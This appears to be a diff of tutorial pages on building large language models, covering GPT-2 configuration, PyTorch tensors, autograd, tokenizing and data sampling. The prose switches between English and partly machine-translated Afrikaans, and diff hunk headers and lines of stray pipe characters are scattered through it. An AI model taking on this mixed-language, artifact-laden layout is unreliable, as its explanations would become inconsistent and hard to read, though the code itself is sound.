- **Embedding dimension**: The size of the vector used to represent each token or word. LLMs usually use hundreds to a few thousand dimensions.
- **Hidden dimension**: The size of the hidden layers in the neural network.
- **Number of layers (depth)**: How many layers the model has. LLMs usually use tens of layers.
- **Number of attention heads**: In transformer models, how many separate attention mechanisms are used in each layer. LLMs usually use tens of heads.
- **Dropout**: Dropout is roughly the percentage of activations that is dropped (their probabilities set to 0) during training, used to **prevent overfitting**. LLMs usually use between 0-20%.

Configuration of the GPT-2 model:
```python
GPT_CONFIG_124M = {
    "vocab_size": 50257,    # Vocabulary size of the BPE tokenizer
    "context_length": 1024, # Context length
    "emb_dim": 768,         # Embedding dimension
    "n_heads": 12,          # Number of attention heads
    "n_layers": 12,         # Number of layers
    "drop_rate": 0.1,       # Dropout rate: 10%
    "qkv_bias": False       # Query-Key-Value bias
}
```
|
|
||||||
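As a quick sketch of how such a config is typically consumed (this is not the full GPT-2 implementation), the vocabulary size, context length and embedding dimension already determine the two embedding tables the model starts with:
```python
import torch

# Assumed subset of the config above; only used to size the embedding tables
cfg = {"vocab_size": 50257, "context_length": 1024, "emb_dim": 768}

tok_emb = torch.nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])      # token embeddings
pos_emb = torch.nn.Embedding(cfg["context_length"], cfg["emb_dim"])  # positional embeddings

params = sum(p.numel() for p in tok_emb.parameters()) + \
         sum(p.numel() for p in pos_emb.parameters())
print(f"Embedding parameters alone: {params:,}")  # ~39.4M of the ~124M total
```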
## Tensors in PyTorch
|
|
||||||
|
|
||||||
In PyTorch, 'n **tensor** is 'n fundamentele datastruktuur wat dien as 'n multi-dimensionele array, wat konsepte soos skalar, vektore en matrikse veralgemeen na moontlik hoër dimensies. Tensors is die primêre manier waarop data voorgestel en gemanipuleer word in PyTorch, veral in die konteks van diep leer en neurale netwerke.
|
|
||||||
|
|
||||||
### Mathematical Concept of Tensors
|
|
||||||
|
|
||||||
- **Scalars**: Tensors van rang 0, wat 'n enkele getal voorstel (nul-dimensioneel). Soos: 5
|
|
||||||
- **Vectors**: Tensors van rang 1, wat 'n een-dimensionele array van getalle voorstel. Soos: \[5,1]
|
|
||||||
- **Matrices**: Tensors van rang 2, wat twee-dimensionele arrays met rye en kolomme voorstel. Soos: \[\[1,3], \[5,2]]
|
|
||||||
- **Higher-Rank Tensors**: Tensors van rang 3 of meer, wat data in hoër dimensies voorstel (bv. 3D tensors vir kleurbeelde).
|
|
||||||
|
|
||||||
### Tensors as Data Containers
|
|
||||||
|
|
||||||
From a computational perspective, tensors act as containers for multi-dimensional data, where each dimension can represent different features or aspects of the data. This makes tensors highly suitable for handling complex datasets in machine learning tasks.
|
|
||||||
|
|
||||||
### PyTorch Tensors vs. NumPy Arrays
|
|
||||||
|
|
||||||
While PyTorch tensors are similar to NumPy arrays in their ability to store and manipulate numerical data, they offer additional functionalities crucial for deep learning:
|
|
||||||
|
|
||||||
- **Automatic Differentiation**: PyTorch tensors support automatic calculation of gradients (autograd), which simplifies the process of computing derivatives required for training neural networks.
|
|
||||||
- **GPU Acceleration**: Tensors in PyTorch can be moved to and computed on GPUs, significantly speeding up large-scale computations.
|
|
||||||
|
|
||||||
### Creating Tensors in PyTorch
|
|
||||||
|
|
||||||
You can create tensors using the `torch.tensor` function:
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
|
|
||||||
# Scalar (0D tensor)
|
|
||||||
tensor0d = torch.tensor(1)
|
|
||||||
|
|
||||||
# Vector (1D tensor)
|
|
||||||
tensor1d = torch.tensor([1, 2, 3])
|
|
||||||
|
|
||||||
# Matrix (2D tensor)
|
|
||||||
tensor2d = torch.tensor([[1, 2],
|
|
||||||
[3, 4]])
|
|
||||||
|
|
||||||
# 3D Tensor
|
|
||||||
tensor3d = torch.tensor([[[1, 2], [3, 4]],
|
|
||||||
[[5, 6], [7, 8]]])
|
|
||||||
```
|
|
||||||
### Tensor Data Tipes
|
|
||||||
|
|
||||||
PyTorch tensors kan data van verskillende tipes stoor, soos heelgetalle en drijvende-komma getalle.
|
|
||||||
|
|
||||||
Jy kan 'n tensor se datatipe nagaan met die `.dtype` attribuut:
|
|
||||||
```python
|
|
||||||
tensor1d = torch.tensor([1, 2, 3])
|
|
||||||
print(tensor1d.dtype) # Output: torch.int64
|
|
||||||
```
|
|
||||||
- Tensore wat van Python-heelgetalle geskep is, is van tipe `torch.int64`.
|
|
||||||
- Tensore wat van Python-vlottende getalle geskep is, is van tipe `torch.float32`.
|
|
||||||
|
|
||||||
Om 'n tensor se datatipe te verander, gebruik die `.to()` metode:
|
|
||||||
```python
|
|
||||||
float_tensor = tensor1d.to(torch.float32)
|
|
||||||
print(float_tensor.dtype) # Output: torch.float32
|
|
||||||
```
|
|
||||||
### Algemene Tensor Operasies
|
|
||||||
|
|
||||||
PyTorch bied 'n verskeidenheid operasies om tensors te manipuleer:
|
|
||||||
|
|
||||||
- **Toegang tot Vorm**: Gebruik `.shape` om die dimensies van 'n tensor te kry.
|
|
||||||
|
|
||||||
```python
|
|
||||||
print(tensor2d.shape) # Output: torch.Size([2, 2])
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Hervorming van Tensors**: Gebruik `.reshape()` of `.view()` om die vorm te verander.
|
|
||||||
|
|
||||||
```python
|
|
||||||
reshaped = tensor2d.reshape(4, 1)
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Transposering van Tensors**: Gebruik `.T` om 'n 2D tensor te transponer.
|
|
||||||
|
|
||||||
```python
|
|
||||||
transposed = tensor2d.T
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Matriks Vermenigvuldiging**: Gebruik `.matmul()` of die `@` operator.
|
|
||||||
|
|
||||||
```python
|
|
||||||
result = tensor2d @ tensor2d.T
|
|
||||||
```
|
|
||||||
|
|
||||||
### Belangrikheid in Diep Leer
|
|
||||||
|
|
||||||
Tensors is noodsaaklik in PyTorch vir die bou en opleiding van neurale netwerke:
|
|
||||||
|
|
||||||
- Hulle stoor invoerdata, gewigte en vooroordele.
|
|
||||||
- Hulle fasiliteer operasies wat vereis word vir vorentoe en agtertoe passasies in opleidingsalgoritmes.
|
|
||||||
- Met autograd, stel tensors outomatiese berekening van gradiënte in staat, wat die optimaliseringsproses stroomlyn.
|
|
||||||
|
|
||||||
## Outomatiese Differensiasie
|
|
||||||
|
|
||||||
Outomatiese differensiasie (AD) is 'n berekeningstegniek wat gebruik word om **die afgeleides (gradiënte)** van funksies doeltreffend en akkuraat te evalueer. In die konteks van neurale netwerke, stel AD die berekening van gradiënte wat benodig word vir **optimaliseringsalgoritmes soos gradiëntafname** moontlik. PyTorch bied 'n outomatiese differensiasie enjin genaamd **autograd** wat hierdie proses vereenvoudig.
|
|
||||||
|
|
||||||
### Wiskundige Verklaring van Outomatiese Differensiasie
|
|
||||||
|
|
||||||
**1. Die Kettingreël**
|
|
||||||
|
|
||||||
In die hart van outomatiese differensiasie is die **kettingreël** van calculus. Die kettingreël stel dat as jy 'n samestelling van funksies het, die afgeleide van die saamgestelde funksie die produk van die afgeleides van die saamgestelde funksies is.
|
|
||||||
|
|
||||||
Wiskundig, as `y=f(u)` en `u=g(x)`, dan is die afgeleide van `y` ten opsigte van `x`:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
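Written out explicitly (a restatement of the rule the figure above refers to):
```latex
\frac{dy}{dx} = \frac{dy}{du} \cdot \frac{du}{dx}
```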
**2. Berekening Grafiek**
|
|
||||||
|
|
||||||
In AD word berekeninge voorgestel as knope in 'n **berekening grafiek**, waar elke knoop ooreenstem met 'n operasie of 'n veranderlike. Deur hierdie grafiek te traverseer, kan ons afgeleides doeltreffend bereken.
|
|
||||||
|
|
||||||
3. Voorbeeld
|
|
||||||
|
|
||||||
Kom ons oorweeg 'n eenvoudige funksie:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
Waar:
|
|
||||||
|
|
||||||
- `σ(z)` is die sigmoid funksie.
|
|
||||||
- `y=1.0` is die teikenetiket.
|
|
||||||
- `L` is die verlies.
|
|
||||||
|
|
||||||
Ons wil die gradiënt van die verlies `L` ten opsigte van die gewig `w` en vooroordeel `b` bereken.
|
|
||||||
|
|
||||||
**4. Berekening van Gradiënte Handmatig**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
**5. Numeriese Berekening**
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
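As a sketch of the manual computation the figures summarise, assuming the standard binary cross-entropy loss and the values used in the PyTorch example below (x = 1.1, w = 2.2, b = 0, y = 1.0):
```latex
z = xw + b = 2.42, \qquad a = \sigma(z) \approx 0.918
\frac{\partial L}{\partial z} = a - y \approx -0.0817, \qquad
\frac{\partial L}{\partial w} = (a - y)\,x \approx -0.0898, \qquad
\frac{\partial L}{\partial b} = a - y \approx -0.0817
```
These values match the gradients printed by the autograd example that follows.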
### Implementering van Outomatiese Differensiasie in PyTorch
|
|
||||||
|
|
||||||
Nou, kom ons kyk hoe PyTorch hierdie proses outomatiseer.
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
import torch.nn.functional as F
|
|
||||||
|
|
||||||
# Define input and target
|
|
||||||
x = torch.tensor([1.1])
|
|
||||||
y = torch.tensor([1.0])
|
|
||||||
|
|
||||||
# Initialize weights with requires_grad=True to track computations
|
|
||||||
w = torch.tensor([2.2], requires_grad=True)
|
|
||||||
b = torch.tensor([0.0], requires_grad=True)
|
|
||||||
|
|
||||||
# Forward pass
|
|
||||||
z = x * w + b
|
|
||||||
a = torch.sigmoid(z)
|
|
||||||
loss = F.binary_cross_entropy(a, y)
|
|
||||||
|
|
||||||
# Backward pass
|
|
||||||
loss.backward()
|
|
||||||
|
|
||||||
# Gradients
|
|
||||||
print("Gradient w.r.t w:", w.grad)
|
|
||||||
print("Gradient w.r.t b:", b.grad)
|
|
||||||
```
|
|
||||||
**Output:**
|
|
||||||
```
|
|
||||||
Gradient w.r.t w: tensor([-0.0898])
|
|
||||||
Gradient w.r.t b: tensor([-0.0817])
|
|
||||||
```
|
|
||||||
## Terugpropagering in Groter Neurale Netwerke
|
|
||||||
|
|
||||||
### **1. Uitbreiding na Meervoudige Lae**
|
|
||||||
|
|
||||||
In groter neurale netwerke met meerdere lae, word die proses om gradiënte te bereken meer kompleks weens die verhoogde aantal parameters en operasies. Tog bly die fundamentele beginsels dieselfde:
|
|
||||||
|
|
||||||
- **Voorwaartse Deurloop:** Bereken die uitvoer van die netwerk deur insette deur elke laag te laat gaan.
|
|
||||||
- **Bereken Verlies:** Evalueer die verliesfunksie met behulp van die netwerk se uitvoer en die teikenetikette.
|
|
||||||
- **Achterwaartse Deurloop (Terugpropagering):** Bereken die gradiënte van die verlies ten opsigte van elke parameter in die netwerk deur die kettingreël herhaaldelik toe te pas van die uitvoerlaag terug na die insetlaag.
|
|
||||||
|
|
||||||
### **2. Terugpropagering Algoritme**
|
|
||||||
|
|
||||||
- **Stap 1:** Begin die netwerkparameters (gewigte en vooroordele).
|
|
||||||
- **Stap 2:** Vir elke opleidingsvoorbeeld, voer 'n voorwaartse deurloop uit om die uitvoer te bereken.
|
|
||||||
- **Stap 3:** Bereken die verlies.
|
|
||||||
- **Stap 4:** Bereken die gradiënte van die verlies ten opsigte van elke parameter met behulp van die kettingreël.
|
|
||||||
- **Stap 5:** Werk die parameters op met 'n optimalisering algoritme (bv. gradiëntafname).
|
|
||||||
|
|
||||||
### **3. Wiskundige Verteenwoordiging**
|
|
||||||
|
|
||||||
Oorweeg 'n eenvoudige neurale netwerk met een versteekte laag:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
### **4. PyTorch Implementasie**
|
|
||||||
|
|
||||||
PyTorch vereenvoudig hierdie proses met sy autograd enjin.
|
|
||||||
```python
|
|
||||||
import torch
|
|
||||||
import torch.nn as nn
|
|
||||||
import torch.optim as optim
|
|
||||||
|
|
||||||
# Define a simple neural network
|
|
||||||
class SimpleNet(nn.Module):
|
|
||||||
def __init__(self):
|
|
||||||
super(SimpleNet, self).__init__()
|
|
||||||
self.fc1 = nn.Linear(10, 5) # Input layer to hidden layer
|
|
||||||
self.relu = nn.ReLU()
|
|
||||||
self.fc2 = nn.Linear(5, 1) # Hidden layer to output layer
|
|
||||||
self.sigmoid = nn.Sigmoid()
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
h = self.relu(self.fc1(x))
|
|
||||||
y_hat = self.sigmoid(self.fc2(h))
|
|
||||||
return y_hat
|
|
||||||
|
|
||||||
# Instantiate the network
|
|
||||||
net = SimpleNet()
|
|
||||||
|
|
||||||
# Define loss function and optimizer
|
|
||||||
criterion = nn.BCELoss()
|
|
||||||
optimizer = optim.SGD(net.parameters(), lr=0.01)
|
|
||||||
|
|
||||||
# Sample data
|
|
||||||
inputs = torch.randn(1, 10)
|
|
||||||
labels = torch.tensor([1.0])
|
|
||||||
|
|
||||||
# Training loop
|
|
||||||
optimizer.zero_grad() # Clear gradients
|
|
||||||
outputs = net(inputs) # Forward pass
|
|
||||||
loss = criterion(outputs, labels) # Compute loss
|
|
||||||
loss.backward() # Backward pass (compute gradients)
|
|
||||||
optimizer.step() # Update parameters
|
|
||||||
|
|
||||||
# Accessing gradients
|
|
||||||
for name, param in net.named_parameters():
|
|
||||||
if param.requires_grad:
|
|
||||||
print(f"Gradient of {name}: {param.grad}")
|
|
||||||
```
|
|
||||||
In hierdie kode:
|
|
||||||
|
|
||||||
- **Voorwaartse Deurloop:** Bereken die uitsette van die netwerk.
|
|
||||||
- **Achterwaartse Deurloop:** `loss.backward()` bereken die gradiënte van die verlies ten opsigte van alle parameters.
|
|
||||||
- **Parameter Opdatering:** `optimizer.step()` werk die parameters op gebaseer op die berekende gradiënte.
|
|
||||||
|
|
||||||
### **5. Verstaan van die Achterwaartse Deurloop**
|
|
||||||
|
|
||||||
Tydens die agterwaartse deurloop:
|
|
||||||
|
|
||||||
- PyTorch traverseer die berekeningsgrafiek in omgekeerde volgorde.
|
|
||||||
- Vir elke operasie, pas dit die kettingreël toe om gradiënte te bereken.
|
|
||||||
- Gradiënte word opgelaai in die `.grad` eienskap van elke parameter tensor.
|
|
||||||
|
|
||||||
### **6. Voordele van Outomatiese Differensiasie**
|
|
||||||
|
|
||||||
- **Doeltreffendheid:** Vermy oorbodige berekeninge deur tussenresultate te hergebruik.
|
|
||||||
- **Nauwkeurigheid:** Verskaf presiese afgeleides tot masjienpresisie.
|
|
||||||
- **Gebruiksgemak:** Elimineer handmatige berekening van afgeleides.
|
|
@ -1,95 +0,0 @@
|
|||||||
# 1. Tokenizing
|
|
||||||
|
|
||||||
## Tokenizing
|
|
||||||
|
|
||||||
**Tokenizing** is die proses om data, soos teks, in kleiner, hanteerbare stukke genaamd _tokens_ op te breek. Elke token word dan aan 'n unieke numeriese identifiseerder (ID) toegeken. Dit is 'n fundamentele stap in die voorbereiding van teks vir verwerking deur masjienleer modelle, veral in natuurlike taalverwerking (NLP).
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> Die doel van hierdie aanvanklike fase is baie eenvoudig: **Verdeel die invoer in tokens (ids) op 'n manier wat sin maak**.
|
|
||||||
|
|
||||||
### **How Tokenizing Works**
|
|
||||||
|
|
||||||
1. **Splitting the Text:**
|
|
||||||
- **Basic Tokenizer:** 'n Eenvoudige tokenizer kan teks in individuele woorde en leestekens verdeel, terwyl spaties verwyder word.
|
|
||||||
- _Example:_\
|
|
||||||
Teks: `"Hello, world!"`\
|
|
||||||
Tokens: `["Hello", ",", "world", "!"]`
|
|
||||||
2. **Creating a Vocabulary:**
|
|
||||||
- Om tokens in numeriese IDs om te skakel, word 'n **vocabulary** geskep. Hierdie vocabulary lys al die unieke tokens (woorde en simbole) en ken elkeen 'n spesifieke ID toe.
|
|
||||||
- **Special Tokens:** Dit is spesiale simbole wat by die vocabulary gevoeg word om verskillende scenario's te hanteer:
|
|
||||||
- `[BOS]` (Beginning of Sequence): Dui die begin van 'n teks aan.
|
|
||||||
- `[EOS]` (End of Sequence): Dui die einde van 'n teks aan.
|
|
||||||
- `[PAD]` (Padding): Gebruik om alle reekse in 'n batch dieselfde lengte te maak.
|
|
||||||
- `[UNK]` (Unknown): Verteenwoordig tokens wat nie in die vocabulary is nie.
|
|
||||||
- _Example:_\
|
|
||||||
As `"Hello"` ID `64` toegeken word, `","` is `455`, `"world"` is `78`, en `"!"` is `467`, dan:\
|
|
||||||
`"Hello, world!"` → `[64, 455, 78, 467]`
|
|
||||||
- **Handling Unknown Words:**\
|
|
||||||
As 'n woord soos `"Bye"` nie in die vocabulary is nie, word dit vervang met `[UNK]`.\
|
|
||||||
`"Bye, world!"` → `["[UNK]", ",", "world", "!"]` → `[987, 455, 78, 467]`\
|
|
||||||
_(Aannemende `[UNK]` het ID `987`)_
|
|
||||||
|
|
||||||
### **Advanced Tokenizing Methods**
|
|
||||||
|
|
||||||
Terwyl die basiese tokenizer goed werk vir eenvoudige teks, het dit beperkings, veral met groot vocabularies en die hantering van nuwe of seldsame woorde. Gevorderde tokenizing metodes spreek hierdie probleme aan deur teks in kleiner subeenhede op te breek of die tokenisering proses te optimaliseer.
|
|
||||||
|
|
||||||
1. **Byte Pair Encoding (BPE):**
|
|
||||||
- **Purpose:** Verminder die grootte van die vocabulary en hanteer seldsame of onbekende woorde deur hulle op te breek in gereeld voorkomende byte pare.
|
|
||||||
- **How It Works:**
|
|
||||||
- Begin met individuele karakters as tokens.
|
|
||||||
- Samevoeg iteratief die mees gereelde pare van tokens in 'n enkele token.
|
|
||||||
- Gaan voort totdat daar geen meer gereelde pare is wat saamgevoeg kan word nie.
|
|
||||||
- **Benefits:**
|
|
||||||
- Elimineer die behoefte aan 'n `[UNK]` token aangesien alle woorde verteenwoordig kan word deur bestaande subwoord tokens te kombineer.
|
|
||||||
- Meer doeltreffende en buigsame vocabulary.
|
|
||||||
- _Example:_\
|
|
||||||
`"playing"` mag tokenized word as `["play", "ing"]` as `"play"` en `"ing"` gereelde subwoorde is.
|
|
||||||
2. **WordPiece:**
|
|
||||||
- **Used By:** Modelle soos BERT.
|
|
||||||
- **Purpose:** Soortgelyk aan BPE, breek dit woorde in subwoord eenhede om onbekende woorde te hanteer en die vocabulary grootte te verminder.
|
|
||||||
- **How It Works:**
|
|
||||||
- Begin met 'n basis vocabulary van individuele karakters.
|
|
||||||
- Voeg iteratief die mees gereelde subwoord by wat die waarskynlikheid van die opleidingsdata maksimeer.
|
|
||||||
- Gebruik 'n probabilistiese model om te besluit watter subwoorde saamgevoeg moet word.
|
|
||||||
- **Benefits:**
|
|
||||||
- Balans tussen 'n hanteerbare vocabulary grootte en effektiewe verteenwoordiging van woorde.
|
|
||||||
- Hanteer seldsame en saamgestelde woorde doeltreffend.
|
|
||||||
- _Example:_\
|
|
||||||
`"unhappiness"` mag tokenized word as `["un", "happiness"]` of `["un", "happy", "ness"]` afhangende van die vocabulary.
|
|
||||||
3. **Unigram Language Model:**
|
|
||||||
- **Used By:** Modelle soos SentencePiece.
|
|
||||||
- **Purpose:** Gebruik 'n probabilistiese model om die mees waarskynlike stel van subwoord tokens te bepaal.
|
|
||||||
- **How It Works:**
|
|
||||||
- Begin met 'n groot stel potensiële tokens.
|
|
||||||
- Verwyder iteratief tokens wat die minste die model se waarskynlikheid van die opleidingsdata verbeter.
|
|
||||||
- Finaliseer 'n vocabulary waar elke woord verteenwoordig word deur die mees waarskynlike subwoord eenhede.
|
|
||||||
- **Benefits:**
|
|
||||||
- Buigsame en kan taal meer natuurlik modelleer.
|
|
||||||
- Lei dikwels tot meer doeltreffende en kompakte tokenizations.
|
|
||||||
- _Example:_\
|
|
||||||
`"internationalization"` mag in kleiner, betekenisvolle subwoorde soos `["international", "ization"]` tokenized word.
|
|
||||||
|
|
||||||
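To make the basic flow concrete, here is a minimal sketch of a whitespace/punctuation tokenizer with a toy vocabulary and an `[UNK]` fallback (the function name and regex are illustrative assumptions, not part of any specific library):
```python
import re

def simple_tokenize(text):
    # Split on whitespace and keep punctuation marks as separate tokens
    return [t for t in re.split(r'([,.!?]|\s)', text) if t and not t.isspace()]

tokens = simple_tokenize("Hello, world!")       # ['Hello', ',', 'world', '!']

# Toy vocabulary with an [UNK] entry for out-of-vocabulary words
vocab = {tok: i for i, tok in enumerate(sorted(set(tokens)))}
vocab["[UNK]"] = len(vocab)

ids = [vocab.get(t, vocab["[UNK]"]) for t in simple_tokenize("Bye, world!")]
print(ids)  # "Bye" falls back to the [UNK] id
```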
## Code Example
|
|
||||||
|
|
||||||
Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
|
|
||||||
```python
|
|
||||||
# Download a text to pre-train the model
|
|
||||||
import urllib.request
|
|
||||||
url = ("https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt")
|
|
||||||
file_path = "the-verdict.txt"
|
|
||||||
urllib.request.urlretrieve(url, file_path)
|
|
||||||
|
|
||||||
with open("the-verdict.txt", "r", encoding="utf-8") as f:
|
|
||||||
raw_text = f.read()
|
|
||||||
|
|
||||||
# Tokenize the text using the GPT-2 BPE tokenizer
import tiktoken
token_ids = tiktoken.get_encoding("gpt2").encode(raw_text, allowed_special={"<|endoftext|>"})  # allow the special "<|endoftext|>" token
|
|
||||||
|
|
||||||
# Print first 50 tokens
|
|
||||||
print(token_ids[:50])
|
|
||||||
#[40, 367, 2885, 1464, 1807, 3619, 402, 271, 10899, 2138, 257, 7026, 15632, 438, 2016, 257, 922, 5891, 1576, 438, 568, 340, 373, 645, 1049, 5975, 284, 502, 284, 3285, 326, 11, 287, 262, 6001, 286, 465, 13476, 11, 339, 550, 5710, 465, 12036, 11, 6405, 257, 5527, 27075, 11]
|
|
||||||
```
|
|
||||||
## Verwysings
|
|
||||||
|
|
||||||
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
|
|
@ -1,240 +0,0 @@
|
|||||||
# 2. Data Sampling
|
|
||||||
|
|
||||||
## **Data Sampling**
|
|
||||||
|
|
||||||
**Data Sampling** is a crucial process in preparing data for training large language models (LLMs) like GPT. It involves organizing text data into input and target sequences that the model uses to learn how to predict the next word (or token) based on the preceding words. Proper data sampling ensures that the model effectively captures language patterns and dependencies.
|
|
||||||
|
|
||||||
> [!TIP]
|
|
||||||
> The goal of this second phase is very simple: **Sample the input data and prepare it for the training phase usually by separating the dataset into sentences of a specific length and generating also the expected response.**
|
|
||||||
|
|
||||||
### **Why Data Sampling Matters**
|
|
||||||
|
|
||||||
LLMs such as GPT are trained to generate or predict text by understanding the context provided by previous words. To achieve this, the training data must be structured in a way that the model can learn the relationship between sequences of words and their subsequent words. This structured approach allows the model to generalize and generate coherent and contextually relevant text.
|
|
||||||
|
|
||||||
### **Key Concepts in Data Sampling**
|
|
||||||
|
|
||||||
1. **Tokenization:** Breaking down text into smaller units called tokens (e.g., words, subwords, or characters).
|
|
||||||
2. **Sequence Length (max_length):** The number of tokens in each input sequence.
|
|
||||||
3. **Sliding Window:** A method to create overlapping input sequences by moving a window over the tokenized text.
|
|
||||||
4. **Stride:** The number of tokens the sliding window moves forward to create the next sequence.
|
|
||||||
|
|
||||||
### **Step-by-Step Example**
|
|
||||||
|
|
||||||
Let's walk through an example to illustrate data sampling.
|
|
||||||
|
|
||||||
**Example Text**
|
|
||||||
|
|
||||||
```text
|
|
||||||
"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
|
|
||||||
```
|
|
||||||
|
|
||||||
**Tokenization**
|
|
||||||
|
|
||||||
Assume we use a **basic tokenizer** that splits the text into words and punctuation marks:
|
|
||||||
|
|
||||||
```text
|
|
||||||
Tokens: ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
|
|
||||||
```
|
|
||||||
|
|
||||||
**Parameters**
|
|
||||||
|
|
||||||
- **Max Sequence Length (max_length):** 4 tokens
|
|
||||||
- **Sliding Window Stride:** 1 token
|
|
||||||
|
|
||||||
**Creating Input and Target Sequences**
|
|
||||||
|
|
||||||
1. **Sliding Window Approach:**
|
|
||||||
- **Input Sequences:** Each input sequence consists of `max_length` tokens.
|
|
||||||
- **Target Sequences:** Each target sequence consists of the tokens that immediately follow the corresponding input sequence.
|
|
||||||
2. **Generating Sequences:**
|
|
||||||
|
|
||||||
<table><thead><tr><th width="177">Window Position</th><th>Input Sequence</th><th>Target Sequence</th></tr></thead><tbody><tr><td>1</td><td>["Lorem", "ipsum", "dolor", "sit"]</td><td>["ipsum", "dolor", "sit", "amet,"]</td></tr><tr><td>2</td><td>["ipsum", "dolor", "sit", "amet,"]</td><td>["dolor", "sit", "amet,", "consectetur"]</td></tr><tr><td>3</td><td>["dolor", "sit", "amet,", "consectetur"]</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td></tr><tr><td>4</td><td>["sit", "amet,", "consectetur", "adipiscing"]</td><td>["amet,", "consectetur", "adipiscing", "elit."]</td></tr></tbody></table>
|
|
||||||
|
|
||||||
3. **Resulting Input and Target Arrays:**
|
|
||||||
|
|
||||||
- **Input:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
[
|
|
||||||
["Lorem", "ipsum", "dolor", "sit"],
|
|
||||||
["ipsum", "dolor", "sit", "amet,"],
|
|
||||||
["dolor", "sit", "amet,", "consectetur"],
|
|
||||||
["sit", "amet,", "consectetur", "adipiscing"],
|
|
||||||
]
|
|
||||||
```
|
|
||||||
|
|
||||||
- **Target:**
|
|
||||||
|
|
||||||
```python
|
|
||||||
[
|
|
||||||
["ipsum", "dolor", "sit", "amet,"],
|
|
||||||
["dolor", "sit", "amet,", "consectetur"],
|
|
||||||
["sit", "amet,", "consectetur", "adipiscing"],
|
|
||||||
["amet,", "consectetur", "adipiscing", "elit."],
|
|
||||||
]
|
|
||||||
```
|
|
||||||
|
|
||||||
**Visual Representation**
|
|
||||||
|
|
||||||
<table><thead><tr><th width="222">Token Position</th><th>Token</th></tr></thead><tbody><tr><td>1</td><td>Lorem</td></tr><tr><td>2</td><td>ipsum</td></tr><tr><td>3</td><td>dolor</td></tr><tr><td>4</td><td>sit</td></tr><tr><td>5</td><td>amet,</td></tr><tr><td>6</td><td>consectetur</td></tr><tr><td>7</td><td>adipiscing</td></tr><tr><td>8</td><td>elit.</td></tr></tbody></table>
|
|
||||||
|
|
||||||
**Sliding Window with Stride 1:**
|
|
||||||
|
|
||||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
|
|
||||||
- **Second Window (Positions 2-5):** \["ipsum", "dolor", "sit", "amet,"] → **Target:** \["dolor", "sit", "amet,", "consectetur"]
|
|
||||||
- **Third Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
|
|
||||||
- **Fourth Window (Positions 4-7):** \["sit", "amet,", "consectetur", "adipiscing"] → **Target:** \["amet,", "consectetur", "adipiscing", "elit."]
|
|
||||||
|
|
||||||
**Understanding Stride**
|
|
||||||
|
|
||||||
- **Stride of 1:** The window moves forward by one token each time, resulting in highly overlapping sequences. This can lead to better learning of contextual relationships but may increase the risk of overfitting since similar data points are repeated.
|
|
||||||
- **Stride of 2:** The window moves forward by two tokens each time, reducing overlap. This decreases redundancy and computational load but might miss some contextual nuances.
|
|
||||||
- **Stride Equal to max_length:** The window moves forward by the entire window size, resulting in non-overlapping sequences. This minimizes data redundancy but may limit the model's ability to learn dependencies across sequences.
|
|
||||||
|
|
||||||
**Example with Stride of 2:**
|
|
||||||
|
|
||||||
Using the same tokenized text and `max_length` of 4:
|
|
||||||
|
|
||||||
- **First Window (Positions 1-4):** \["Lorem", "ipsum", "dolor", "sit"] → **Target:** \["ipsum", "dolor", "sit", "amet,"]
|
|
||||||
- **Second Window (Positions 3-6):** \["dolor", "sit", "amet,", "consectetur"] → **Target:** \["sit", "amet,", "consectetur", "adipiscing"]
|
|
||||||
- **Third Window (Positions 5-8):** \["amet,", "consectetur", "adipiscing", "elit."] → **Target:** \["consectetur", "adipiscing", "elit.", "sed"] _(Assuming continuation)_
|
|
||||||
|
|
||||||
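Before the full `Dataset`/`DataLoader` version below, here is a minimal dependency-free sketch of the sliding-window pairing described above (token strings instead of token ids, purely for illustration):
```python
tokens = ["Lorem", "ipsum", "dolor", "sit", "amet,", "consectetur", "adipiscing", "elit."]
max_length, stride = 4, 1

inputs, targets = [], []
for i in range(0, len(tokens) - max_length, stride):
    inputs.append(tokens[i:i + max_length])            # current window
    targets.append(tokens[i + 1:i + max_length + 1])   # same window shifted by one token

for x, y in zip(inputs, targets):
    print(x, "->", y)   # reproduces the four window/target rows of the table above
```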
## Code Example
|
|
||||||
|
|
||||||
Let's understand this better from a code example from [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch02/01_main-chapter-code/ch02.ipynb):
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Download the text to pre-train the LLM
|
|
||||||
import urllib.request
|
|
||||||
